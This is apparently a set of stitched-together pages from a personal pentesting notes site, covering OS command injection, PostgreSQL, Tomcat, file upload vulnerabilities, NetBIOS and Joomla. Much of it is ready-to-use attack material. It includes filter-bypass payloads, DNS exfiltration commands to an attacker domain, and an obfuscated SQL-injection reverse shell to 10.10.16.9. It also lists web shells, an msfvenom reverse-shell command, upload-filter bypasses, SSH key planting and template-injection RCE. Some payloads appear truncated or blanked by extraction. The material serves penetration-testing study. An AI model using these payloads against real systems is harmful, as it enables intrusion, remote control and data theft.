Tools**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#os-command-injection-tools) -------------------------------------------------------------------------------------------------------------------------------------------------------------- * [Linux - Bash Obfuscator](https://github.com/Bashfuscator/Bashfuscator) * [Windows - DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) * Auto tool - [https://github.com/commixproject/commix](https://github.com/commixproject/commix) * * * **Injection Operators**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#injection-operators) ------------------------------------------------------------------------------------------------------------------------------------------------ Injection Operator Injection Character URL-Encoded Character Executed Command Semicolon ; %3b Both New Line %0a Both Background & %26 Both (second output generally shown first) Pipe | %7c Both (only second output is shown) AND && %26%26 Both (only if first succeeds) OR || %7c%7c Second (only if first fails) Sub-Shell \`\` %60%60 Both (Linux-only) Sub-Shell $() %24%28%29 Both (Linux-only) * * * **Linux Filtered Character Bypass**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#linux-filtered-character-bypass) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Filtered Character Bypass Method Description printenv command `printenv` Can be used to view all environment variables Space Character %09 Using tabs instead of spaces Space Character ${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $()) Space Character {ls,-la} Commas will be replaced with spaces `/` Character ${PATH:0:1} Will be replaced with / `;` Character ${LS\_COLORS:10:1} Will be replaced with ; Any Character $(tr '!-}' '"-~'<<<\[)\ \ Shift character by one (\[ -> )\ \ * * *\ \ **Windows Filtered Character Bypass**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#windows-filtered-character-bypass)\ \ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ \ Filtered Character\ \ Bypass Method\ \ Description\ \ Env command\ \ Get-ChildItem Env\ \ Can be used to view all environment variables - (PowerShell)\ \ Space Character\ \ %09\ \ Using tabs instead of spaces\ \ Space Character\ \ %PROGRAMFILES:~10,-5%\ \ Will be replaced with a space - (CMD)\ \ Space Character\ \ $env:PROGRAMFILES\[10\]\ \ Will be replaced with a space - (PowerShell)\ \ `\` Character\ \ %HOMEPATH:~0,-17%\ \ Will be replaced with `\` - (CMD)\ \ `\` Character\ \ $env:HOMEPATH\[0\]\ \ Will be replaced with `\` - (PowerShell)\ \ * * *\ \ **Linux Blacklisted Command Bypass**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#linux-blacklisted-command-bypass)\ \ --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ \ Blacklist Bypass\ \ Payload\ \ Description\ \ Case Manipulation\ \ `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")`\ \ Execute command regardless of cases\ \ Case Manipulation\ \ `$(a="WhOaMi";printf %s "${a,,}")`\ \ Another variation of the technique\ \ Reversing a Command\ \ `echo 'whoami' | rev`\ \ Reverse a string\ \ Reversing a Command\ \ `$(rev<<<'imaohw')`\ \ Execute reversed command\ \ Base64 Encoding Commands\ \ `echo -n 'cat /etc/passwd | grep 33' | base64`\ \ Encode a string with base64\ \ Base64 Encoding Commands\ \ `bash<<<$(base64 -d<< ` and `sleep`\ \ If the web application's response time differs from its normal times, then you most probably confirmed that a blind os command injection is available for you to exploit.\ \ * * *\ \ ### Blind injection with out-of-band (DNS) data exfiltration[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#blind-injection-with-out-of-band-dns-data-exfiltration)\ \ If you are dealing with a **blind** os command injection, you can use the **DNS** protocol to perform out-of-band data exfiltration. You can use services such as interact-sh or burp collaborator to set up a target domain **to read the output of your commands**\ \ You can use payloads such as the following ones to send a **DNS request to a subdomain named with the command's output**:\ \ * ``||nslookup+`whoami`.YOURDOMAIN||``\ \ * `;host $((whoami)|base64).YOURDOMAIN;`\ \ \ * * *\ \ ### PHP backtick character[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#php-backtick-character)\ \ The backtick character (`` `) `` in PHP can be used to gain OS command injection, as it is a character used for shell commands execution, similarly to `shell_exec()`function.\ \ When you enclose a string in backticks, PHP will execute it as a shell command and return the output.\ \ Consider the following example scenario:\ \ 1. You are dealing with a web application written in PHP where a `ping.php` page is hosted.\ \ 2. Navigating to `http://example.com/ping.php?ip=10.10.10.10` allows users to ping the ip address specified (10.10.10.10)\ \ 3. If any standard way to perform OS command execution does not work, you could use the backticks to your advantage. For example, you could navigate to: `` http://example.com/ping.php?ip=10.10.10.10;`ls` `` to effectively run the `ls` command after the ping\ \ \ [PreviousInsecure Direct Object References (IDOR)](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor)\ [NextLocal File Inclusion (LFI)](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/local-file-inclusion-lfi)\ \ Last updated 1 year ago\ \ * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#introduction)\ \ * [OS Command Injection Tools](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#os-command-injection-tools)\ \ * [Injection Operators](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#injection-operators)\ \ * [Linux Filtered Character Bypass](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#linux-filtered-character-bypass)\ \ * [Windows Filtered Character Bypass](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#windows-filtered-character-bypass)\ \ * [Linux Blacklisted Command Bypass](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#linux-blacklisted-command-bypass)\ \ * [Windows Blacklisted Command Bypass](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#windows-blacklisted-command-bypass)\ \ * [Miscellaneous & Tricks](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#miscellaneous-and-tricks)\ \ * [Detecting blind OS command injection using time delays](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#detecting-blind-os-command-injection-using-time-delays)\ \ * [Blind injection with out-of-band (DNS) data exfiltration](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#blind-injection-with-out-of-band-dns-data-exfiltration)\ \ * [PHP backtick character](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#php-backtick-character) --- # PostgreSQL Port (5432) | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres.md) . PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on standard ports 5432 or alternative ports like 5433. How to Connect[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#how-to-connect) --------------------------------------------------------------------------------------------------------------------------- ### Basic Local Connection[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#basic-local-connection) Copy psql -U Opens the psql console with the specified user. ### Remote Connection (Basic)[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#remote-connection-basic) Copy psql -h -U -d Connect to a remote PostgreSQL server specifying host, username, and database. ### Remote Connection (Full Parameters)[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#remote-connection-full-parameters) Copy psql -h -p -U -W Complete remote connection with all parameters including custom port and password prompt. Enumeration[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#enumeration) --------------------------------------------------------------------------------------------------------------------- ### List All Databases[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-all-databases) This command displays all available databases on the PostgreSQL server. ### Switch to a Database[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#switch-to-a-database) Change the current working database context. ### List Tables in Current Database[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-tables-in-current-database) Shows all tables within the currently selected database. ### Extract Data from Specific Table[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#extract-data-from-specific-table) Retrieve all records from a specified table. File System Operations[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#file-system-operations) ------------------------------------------------------------------------------------------------------------------------------------------- ### Read File[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#read-file) Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of `/etc/passwd`. ### List Directory[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-directory) Lists the contents of a directory on the server's filesystem. Advanced Exploitation[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#advanced-exploitation) ----------------------------------------------------------------------------------------------------------------------------------------- ### Reverse Shell WAF Bypass through SQL Injection[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#reverse-shell-waf-bypass-through-sql-injection) This technique uses PostgreSQL's `COPY` command with a program execution to establish a reverse shell connection. The payload: * Uses `CHR()` functions to obfuscate the "COPY" command * Executes a bash reverse shell connecting to IP `10.10.16.9` on port `443` * Bypasses basic WAF filters through string concatenation **Note:** Remember to replace the IP address and port with your actual listener configuration. Security Considerations[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#security-considerations) --------------------------------------------------------------------------------------------------------------------------------------------- [PreviousPOP3 Port (110)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/pop3-port-110) [NextRDP Port (3389)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-3389-or-rdp) Last updated 1 year ago * [How to Connect](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#how-to-connect) * [Basic Local Connection](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#basic-local-connection) * [Remote Connection (Basic)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#remote-connection-basic) * [Remote Connection (Full Parameters)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#remote-connection-full-parameters) * [Enumeration](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#enumeration) * [List All Databases](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-all-databases) * [Switch to a Database](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#switch-to-a-database) * [List Tables in Current Database](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-tables-in-current-database) * [Extract Data from Specific Table](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#extract-data-from-specific-table) * [File System Operations](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#file-system-operations) * [Read File](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#read-file) * [List Directory](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#list-directory) * [Advanced Exploitation](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#advanced-exploitation) * [Reverse Shell WAF Bypass through SQL Injection](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#reverse-shell-waf-bypass-through-sql-injection) * [Security Considerations](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres#security-considerations) Copy \l Copy \c Copy \dt Copy SELECT * FROM ; Copy ''; SELECT pg_read_file('/etc/passwd',0,1000); Copy ''; SELECT pg_ls_dir('/var/www/'); Copy '';DO $reverse$ DECLARE s text; BEGIN s := CHR(67)||CHR(79)||CHR(80)||CHR(89)|| ' (SELECT '''') TO PROGRAM ' || quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"'); EXECUTE s; END $reverse$; --- # Apache Tomcat Ports (8080,8180) | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-8080-8180-apache-tomcat.md) . Metasploit default credentials module Copy use auxiliary/admin/http/tomcat_administration use auxiliary/scanner/http/tomcat_mgr_login use auxiliary/scanner/http/tomcat_enum Post Exploitation Copy use post/multi/gather/tomcat_gather use post/windows/gather/enum_tomcat [PreviousLDAP Ports (389,636)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-389-636-ldap) [NextPort 123 - NTP](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-123-or-ntp) Last updated 1 year ago --- # File Upload Vulnerabilities | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#introduction) -------------------------------------------------------------------------------------------------------------------------- File upload vulnerabilities arise when a web server allows users to upload files to its filesystem without sufficiently validating them. The ability to upload a malicious file can be an issue by itself, as attackers might upload dangerous data on the filesystem. In other cases, an attacker could potentially upload a server-side code file that functions as a web shell, effectively granting them full control over the server. The impact of this class of vulnerabilities mostly depends on two factors: 1. Which part of the file is properly validated (e.g. its size, type, contents, ...) 2. Which restrictions are set on the file after it has effectively been uploaded * * * How Web Servers handle file requests[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#how-web-servers-handle-file-requests) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- Whenever a resource is requested, the web server parses the path in the request to identify the file extension. The server then uses this to determine the type of the file being requested, typically by comparing it to a list of preconfigured mappings between extensions and MIME types. What happens next depends on the file type and the server's configuration. When requesting a **static file**, the server will most probably send the file's contents to the client within an HTTP response. When requesting a **dynamic file**, there are two cases: * If the server is configured to execute files of that type, it will assign variables based on the headers and parameters in the HTTP request before running the script. The resulting output may then be sent to the client in an HTTP response * If the server is not configured to execute files of that type, it will generally respond with an error. However, in some cases, the contents of the file may still be served to the client as plain text. Note: The Content-Type response header may provide clues as to what kind of file the server thinks it has served. If this header hasn't been explicitly set by the application code, it normally contains the result of the file extension/MIME type mapping. _If you are lucky enough, you might edit your request's "Accept" header to ask for a specific response content-type, potentially allowing you to still gain code execution!_ * * * **File Types and Related Attacks**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-types-and-related-attacks) -------------------------------------------------------------------------------------------------------------------------------------------------------------- File Types Potential Attack HTML, JS, SVG, GIF XSS XML, SVG, PDF, PPT, DOC XXE/SSRF ZIP, JPG, PNG DoS * * * **Web and Reverse Shells Payloads to Inject**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#web-and-reverse-shells-payloads-to-inject) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Web Shell Description `` Basic PHP File Read `` Basic PHP Command Execution `` Basic PHP Web Shell `<% eval request('cmd') %>` Basic ASP Web Shell `msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php` Generate PHP reverse shell https://github.com/Arrexel/phpbash PHP Web Shell https://github.com/pentestmonkey/php-reverse-shell PHP Reverse Shell https://github.com/danielmiessler/SecLists/tree/master/Web-Shells List of Web Shells and Reverse Shells * * * **Extension Blacklist Bypasses**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#extension-blacklist-bypasses) ---------------------------------------------------------------------------------------------------------------------------------------------------------- One of the more obvious ways of preventing users from uploading malicious scripts is to blacklist potentially dangerous file extensions like `.php` You might use the following techniques to bypass some basic extension blacklists: Command Description `shell.phtml` Uncommon Extension `shell.pHp` Case Manipulation `shell.jpg.php` Double Extension `shell.php.jpg` Reverse Double Extension `%20, %0a, %00, %0d0a, /, .\, ., …` Character Injection - Before/After Extension [List of PHP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) [List of ASP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP) [List of Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) Use some alternative extensions that might not be blacklisted ### **Overriding the server's configuration files**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#overriding-the-servers-configuration-files) In some cases, you might be able to leverage a file upload vulnerablity to move inside the filesystem and override files. In that case, you can override the server's configuration to allow certain extensions, such as `.php` Apache Servers[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#apache-servers) When dealing with Apache servers, you can write the following directives to the `/etc/apache2/apache2.conf` file: Alternatively, you can also override the `.htaccess` file to write the configuration _for specific directories_. _**Info:**_ _.htaccess files provide a way to make configuration changes on a per-directory basis. The directives in this file apply to the directory where the file is uploaded and its subdirectories._ If the file upload functionality has blacklisted all php extensions, you can upload a php webshell using the `.anything` extension. Then, upload a `.htaccess` file containing the following: You will now be able to access the `webshell.anything` file and gain a PHP webshell! _**Notice:**_ _you will most probably not be able to access the .htaccess file from the webserver, as direct access to it is typically disabled by the web server_ IIS Servers[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#iis-servers) You can make directory-specific configuration on IIS servers using a `web.config` file. For example, in order to enable JSON files to be served to users, you can add the following directives to the previously mentioned file: You may occasionally find servers that fail to stop you from uploading your own malicious configuration file. In this case, even if the file extension you need is blacklisted, you may be able to trick the server into mapping an arbitrary, custom file extension to an executable MIME type. * * * **Content/Type and Mime/Type Bypass**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#content-type-and-mime-type-bypass) -------------------------------------------------------------------------------------------------------------------------------------------------------------------- Modern servers may verify that the contents of the file actually match what is expected. For example, some properties of specific types of files might be checked: uploading a PHP file when an image is expected might fail because the web server is checking for the dimensions (length and width) of the file, which are not properties of a PHP file, causing the validation mechanism to deny the file upload. In some other cases, the file's signature (or magic bytes) are checked during the file upload procedure. A file's signature can be used like a fingerprint or signature to determine whether the contents match the expected type. For example, JPEG files begin with the bytes `FF D8 FF`. Check this link for reference: [List of File Signatures/Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) Using an image file upload as an example, you might be able to upload a php webshell using a **polygot** **JPEG** file containing the payload in its metadata A polyglot file is a single file that can be interpreted in multiple valid formats, depending on the program or context used to open it. These files are crafted to contain data for different file types in such a way that various applications can read or interpret it as different formats. To do that, you can use tools such as `ExifTool` to add the payload, for example, in the image's comment metadata section: This will craft a file named `polyglot.php` which has the contents of a `JPG` file. If the web server check the file's contents to ensure it is a JPG file, this will bypass such restriction. Otherwise, you will need to add extra work on this payload. * * * **Exploiting File Upload Race Conditions**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#exploiting-file-upload-race-conditions) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Some websites' file upload functionalities allow the uploaded file to be uploaded on the filesystem and then remove it if it doesn't pass some validation checks. This kind of behaviour is typical in websites that rely on **anti-virus software and the like to check for malware**. This may only take a few milliseconds, but for the short time that the file exists on the server, the attacker can potentially still execute it. Notice that, if the file is loaded into a temporary directory with a randomized name, it could still be possible for an attacker to exploit a race condition: an example is when the random name is generated using pseudo-random functions like PHP's `uniqid()`, which could be brute-forced. To make attacks like this easier, you can try to extend the amount of time taken to process the file, thereby lengthening the window for brute-forcing the directory name. To do that, you can upload a larger file. If it is processed in chunks, you can potentially take advantage of this by creating a malicious file with the payload at the start, followed by a large number of arbitrary padding bytes. You can check whether a potential file upload race condition is in place by uploading an EICAR file, which is a standard anti-malware test file. If the file is uploaded and deleted from the file system, then it could be possible that an anti-malware check is in place, allowing you to have a short time frame to access your uploaded file. You can download the EICAR file signature [here](https://www.eicar.org/download-anti-malware-testfile/) * * * **File Uploads to XSS Attack**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-uploads-to-xss-attack) ------------------------------------------------------------------------------------------------------------------------------------------------------ There are different cases in which you can gain XSS from file uploads: 1. Uploading a HTML file containing a script in javascript 2. Uploading a HTML file containing a link to our server to steal the document cookie Other cases: 1. Whenever an application shows an image's metadata after its upload, it is possible to inject a payload inside metadata parameters such as `comment` or `artist` by using `exiftool`: * `exiftool -Comment=' ">' HTB.jpg` 2. By using SVG images, it's possible to inject a payload with something like: * `` * * * File Upload to SSH Access[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-upload-to-ssh-access) ------------------------------------------------------------------------------------------------------------------------------------------------ Suppose you have an Arbitrary File Upload vulnerability where you can also specify the uploaded file's location, whether via a vulnerable filename or a path parameter. Also suppose that you have write access on SSH's authorized\_keys file for a local user. You can gain an SSH shell using the following: 1. Use `ssh-keygen` to generate a key named `fileup` 2. cat fileup > authorized\_keys 3. Upload the file to `/home/username/.ssh/authorized_keys` (or `/root/.ssh/authorized_keys`). 4. Note that you might need to leverage a path traversal vulnerability to reach these destinations. 5. Use `ssh username@IP -i fileup` to gain the SSH shell as `username` 6. Notice that SSH might require using `chmod 500 fileup` to use the `-i fileup` option * * * **File Uploads to XXE Attacks**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-uploads-to-xxe-attacks) -------------------------------------------------------------------------------------------------------------------------------------------------------- 1. \[Read `/etc/passwd`\] XXE from SVG images upload by using the following payload: 2. \[Exfiltrate PHP Code\] XXE from SVG to read source code: * * * **Injections in File Names**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#injections-in-file-names) -------------------------------------------------------------------------------------------------------------------------------------------------- > * A common file upload attack uses a malicious string for the uploaded file name > > * The filename may get executed or processed if the uploaded file name is reflected on the page. > > * We can try injecting a command in the file name, and if the web application uses the file name within an OS command, it may lead to a command injection attack. > > * Some examples of filenames for this attack: > 1. System Command Execution * `file$(whoami).jpg` * `file`whoami`.jpg` * `file.jpg||whoami` 2. XSS from filename: * `` 3. SQLi from filename: * `file';select+sleep(5);--.jpg` * * * **Windows Specific Attacks**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#windows-specific-attacks) -------------------------------------------------------------------------------------------------------------------------------------------------- 1. **Reserved Characters:** such as (`|`, `<`, `>`, `*`, or `?`) are characters for special uses (such as wildcards). * If the web application doesn't apply any form of input sanification, it's possible to refer to a file different from the specified one (which does not exist) * This behaviour causes an error which may be shown on the web application, potentially showing the `upload directory` 2. **Windows Reserved Names:** can be used to replicate the same behaviour as the reserved characters previously shown. (`CON`, `COM1`, `LPT1`, or `NUL`) 3. **Windows Filename Convention:** it's possible to overwrite a file (or refer to a non-existant file) by using the `~` character to complete the filename * Example: `HAC~1.TXT` β†’ may refer to hackthebox.txt * Reference: [https://en.wikipedia.org/wiki/8.3\_filename](https://en.wikipedia.org/wiki/8.3_filename) [PreviousSQL Injection (SQLi)](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/sql-injection) [NextInsecure Direct Object References (IDOR)](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#introduction) * [How Web Servers handle file requests](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#how-web-servers-handle-file-requests) * [File Types and Related Attacks](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-types-and-related-attacks) * [Web and Reverse Shells Payloads to Inject](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#web-and-reverse-shells-payloads-to-inject) * [Extension Blacklist Bypasses](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#extension-blacklist-bypasses) * [Overriding the server's configuration files](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#overriding-the-servers-configuration-files) * [Content/Type and Mime/Type Bypass](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#content-type-and-mime-type-bypass) * [Exploiting File Upload Race Conditions](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#exploiting-file-upload-race-conditions) * [File Uploads to XSS Attack](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-uploads-to-xss-attack) * [File Upload to SSH Access](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-upload-to-ssh-access) * [File Uploads to XXE Attacks](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#file-uploads-to-xxe-attacks) * [Injections in File Names](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#injections-in-file-names) * [Windows Specific Attacks](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads#windows-specific-attacks) Copy LoadModule php_module /usr/lib/apache2/modules/libphp.so AddType application/x-httpd-php .php Copy AddType application/x-httpd-php .anything Copy Copy exiftool -Comment="" image.jpg -o polyglot.php Copy ]> &xxe; Copy ]> &xxe; --- # NetBIOS Ports (137,138,139) | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-137-or-138-or-139-or-netbios.md) . Copy nmblookup -A nbtscan /30 -v sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n nmap --script=msrpc-enum ### Metasploit[](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-137-or-138-or-139-or-netbios#metasploit) Copy auxiliary/scanner/netbios/nbname [PreviousNFS Ports (111,2049)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-2049-nfs) [NextOracle TNS Port (1521)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/oracle-tns-port-1521) Last updated 1 year ago --- # Joomla | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#introduction) ------------------------------------------------------------------------------------------------------------------------- > * CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more. > > * Written in PHP and uses MySQL in the backend. > * * * **Joomla Discovery/Footprinting**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-discovery-footprinting) ----------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `droopescan scan joomla --url http://dev.inlanefreight.local` Enumeration via `droopescan` `python2.7 joomlascan.py -u http://dev.inlanefreight.local` Enumeration via `joomlascan.py` `curl -s http://dev.inlanefreight.local/ | grep Joomla` Check Webpage Source `curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -` Some Joomla versions may be fingerprinted from this file Browse to `http://dev.inlanefreight.local/plugins/system/cache/cache.xml` The `cache.xml` file can give out an `approximate version` of Joomla Browse to `http://dev.inlanefreight.local/media/system/js/` Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder Browse to `http://blog.inlanefreight.local/robots.txt` Check for references to Joomla Browse to `http://dev.inlanefreight.local/README.txt` Check the README file to look for references to Joomla * * * **Joomla Users and Login Bruteforcing**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-users-and-login-bruteforcing) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- * **Administrator account:** The default administrator account is admin, but the **password is set at install time** * You can perform login broteforce by using the following: [https://github.com/ajnik/joomla-bruteforce](https://github.com/ajnik/joomla-bruteforce) * PoC: `sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin` * * * **Joomla Known Vulnerabilities**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-known-vulnerabilities) --------------------------------------------------------------------------------------------------------------------------------------------------------- 1. **PHP TEMPLATE CODE INJECTION TO RCE \[Requires Admin Account\]** * The basic idea is to add PHP code inside a template * Login as Admin β†’ Navigate to Configuration β†’ Select a Template β†’ Select an existing PHP file β†’ add the following payload: * `system($_GET['cmd']);` * `curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id` 2. **Joomla 3.9.4 directory traversal** [**CVE-2019-10945**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945) * Exploit 1: https://www.exploit-db.com/exploits/46710 * Exploit 2: https://github.com/dpgg101/CVE-2019-10945 [PreviousSAP Netweaver](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver) 